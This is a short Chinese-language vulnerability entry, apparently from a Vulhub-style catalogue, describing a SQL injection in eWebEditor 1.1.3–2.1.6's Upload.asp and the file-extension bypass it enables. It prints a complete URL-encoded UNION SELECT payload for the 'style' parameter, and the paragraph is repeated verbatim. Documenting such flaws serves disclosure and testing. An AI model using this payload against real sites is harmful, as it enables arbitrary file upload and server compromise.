VULHUB ™

eWebEditor是一个基于浏览器的在线HTML编辑器，其 1.1.3 ~ 2.1.6版本/Upload.asp文件的InitUpload函数处第168行存在sql注入，这里并没有对请求中的参数style进行过滤。 当构造的请求中包含下面这样的参数时:(style=firefox'%20union%20select%20S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,%20[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl%20from%20ewebeditor_style%20where%20s_name='standard'%20and%20'a'='a。即可绕过ewebeditor自身对上传文件后缀的限制，从而达到任意文件上传的目的。 eWebEditor 1.1.3 ~ 2.1.6

eWebEditor是一个基于浏览器的在线HTML编辑器，其 1.1.3 ~ 2.1.6版本/Upload.asp文件的InitUpload函数处第168行存在sql注入，这里并没有对请求中的参数style进行过滤。 当构造的请求中包含下面这样的参数时:(style=firefox'%20union%20select%20S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,%20[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl%20from%20ewebeditor_style%20where%20s_name='standard'%20and%20'a'='a。即可绕过ewebeditor自身对上传文件后缀的限制，从而达到任意文件上传的目的。 eWebEditor 1.1.3 ~ 2.1.6